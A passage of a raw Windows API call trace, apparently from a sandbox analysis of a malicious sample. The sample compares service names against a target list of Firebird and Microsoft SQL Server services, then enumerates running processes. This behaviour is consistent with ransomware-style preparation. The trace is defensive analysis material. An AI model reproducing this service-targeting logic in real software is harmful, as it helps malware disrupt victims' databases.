lstrlenW (lpString="BrokerInfrastructure") returned 20 [0156.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0156.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0156.557] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0156.557] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0156.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0156.557] lstrlenW (lpString="CDPSvc") returned 6 [0156.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0156.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0156.557] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0156.557] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0156.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0156.557] lstrlenW (lpString="ClickToRunSvc") returned 13 [0156.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0156.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0156.557] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0156.557] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0156.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0156.557] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0156.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0156.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0156.557] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0156.557] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0156.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0156.557] lstrlenW (lpString="CryptSvc") returned 8 [0156.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0156.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0156.557] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0156.557] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0156.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0156.558] lstrlenW (lpString="DcomLaunch") returned 10 [0156.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0156.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0156.558] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0156.558] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0156.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0156.558] lstrlenW (lpString="DeviceAssociationService") returned 24 [0156.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0156.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0156.558] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0156.558] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0156.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0156.558] lstrlenW (lpString="Dhcp") returned 4 [0156.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0156.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0156.558] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0156.558] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0156.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0156.558] lstrlenW (lpString="Dnscache") returned 8 [0156.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0156.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0156.558] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0156.558] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0156.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0156.558] lstrlenW (lpString="DoSvc") returned 5 [0156.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0156.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0156.558] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0156.558] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0156.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0156.558] lstrlenW (lpString="DPS") returned 3 [0156.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0156.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0156.559] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0156.559] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0156.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0156.559] lstrlenW (lpString="DusmSvc") returned 7 [0156.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0156.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0156.559] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0156.559] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0156.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0156.559] lstrlenW (lpString="EventLog") returned 8 [0156.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0156.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0156.559] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0156.559] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0156.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0156.559] lstrlenW (lpString="EventSystem") returned 11 [0156.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0156.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0156.559] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0156.559] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0156.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0156.559] lstrlenW (lpString="FontCache") returned 9 [0156.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0156.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0156.559] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0156.559] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0156.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0156.559] lstrlenW (lpString="gpsvc") returned 5 [0156.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0156.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0156.559] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0156.559] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0156.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0156.559] lstrlenW (lpString="iphlpsvc") returned 8 [0156.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0156.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0156.560] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0156.560] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0156.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0156.560] lstrlenW (lpString="KeyIso") returned 6 [0156.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0156.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0156.560] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0156.560] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0156.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0156.560] lstrlenW (lpString="LanmanServer") returned 12 [0156.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0156.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0156.560] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0156.560] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0156.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0156.560] lstrlenW (lpString="LanmanWorkstation") returned 17 [0156.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0156.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0156.560] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0156.560] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0156.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0156.560] lstrlenW (lpString="lfsvc") returned 5 [0156.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0156.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0156.560] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0156.560] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0156.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0156.560] lstrlenW (lpString="lmhosts") returned 7 [0156.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0156.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0156.560] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0156.560] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0156.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0156.561] lstrlenW (lpString="LSM") returned 3 [0156.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0156.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0156.561] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0156.561] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0156.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0156.561] lstrlenW (lpString="MpsSvc") returned 6 [0156.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0156.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0156.561] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0156.561] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0156.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0156.561] lstrlenW (lpString="NcbService") returned 10 [0156.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0156.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0156.561] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0156.561] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0156.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0156.561] lstrlenW (lpString="netprofm") returned 8 [0156.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0156.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0156.561] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0156.561] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0156.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0156.561] lstrlenW (lpString="NlaSvc") returned 6 [0156.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0156.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0156.561] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0156.561] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0156.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0156.561] lstrlenW (lpString="nsi") returned 3 [0156.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0156.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0156.562] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0156.562] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0156.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0156.562] lstrlenW (lpString="PcaSvc") returned 6 [0156.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0156.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0156.562] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0156.562] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0156.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0156.562] lstrlenW (lpString="PlugPlay") returned 8 [0156.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0156.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0156.562] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0156.562] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0156.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0156.562] lstrlenW (lpString="Power") returned 5 [0156.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0156.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0156.562] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0156.562] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0156.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0156.562] lstrlenW (lpString="ProfSvc") returned 7 [0156.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0156.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0156.562] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0156.562] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0156.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0156.563] lstrlenW (lpString="RpcEptMapper") returned 12 [0156.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0156.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0156.563] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0156.563] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0156.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0156.563] lstrlenW (lpString="RpcSs") returned 5 [0156.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0156.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0156.563] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0156.563] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0156.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0156.563] lstrlenW (lpString="SamSs") returned 5 [0156.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0156.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0156.563] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0156.563] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0156.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0156.563] lstrlenW (lpString="Schedule") returned 8 [0156.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0156.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0156.563] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0156.563] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0156.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0156.564] lstrlenW (lpString="SecurityHealthService") returned 21 [0156.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0156.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0156.564] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0156.564] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0156.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0156.564] lstrlenW (lpString="SENS") returned 4 [0156.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0156.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0156.564] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0156.564] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0156.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0156.564] lstrlenW (lpString="ShellHWDetection") returned 16 [0156.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0156.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0156.564] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0156.564] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0156.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0156.564] lstrlenW (lpString="Spooler") returned 7 [0156.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0156.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0156.564] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0156.564] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0156.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0156.564] lstrlenW (lpString="sppsvc") returned 6 [0156.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0156.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0156.565] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0156.565] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0156.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0156.565] lstrlenW (lpString="SSDPSRV") returned 7 [0156.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0156.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0156.565] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0156.565] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0156.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0156.565] lstrlenW (lpString="StateRepository") returned 15 [0156.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0156.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0156.565] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0156.565] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0156.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0156.565] lstrlenW (lpString="SysMain") returned 7 [0156.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0156.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0156.565] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0156.565] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0156.566] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x757728 | out: hHeap=0x710000) returned 1 [0156.566] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0156.579] Process32FirstW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.580] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0156.580] lstrlenW (lpString="System") returned 6 [0156.580] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0156.581] lstrlenW (lpString="smss.exe") returned 8 [0156.581] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0156.582] lstrlenW (lpString="csrss.exe") returned 9 [0156.582] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0156.582] lstrlenW (lpString="wininit.exe") returned 11 [0156.582] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0156.583] lstrlenW (lpString="csrss.exe") returned 9 [0156.583] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0156.583] lstrlenW (lpString="winlogon.exe") returned 12 [0156.583] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0156.584] lstrlenW (lpString="services.exe") returned 12 [0156.584] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0156.584] lstrlenW (lpString="lsass.exe") returned 9 [0156.584] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.585] lstrlenW (lpString="svchost.exe") returned 11 [0156.585] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0156.586] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0156.586] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0156.587] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0156.587] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.587] lstrlenW (lpString="svchost.exe") returned 11 [0156.587] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0156.588] lstrlenW (lpString="dwm.exe") returned 7 [0156.588] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x59, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.589] lstrlenW (lpString="svchost.exe") returned 11 [0156.589] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, 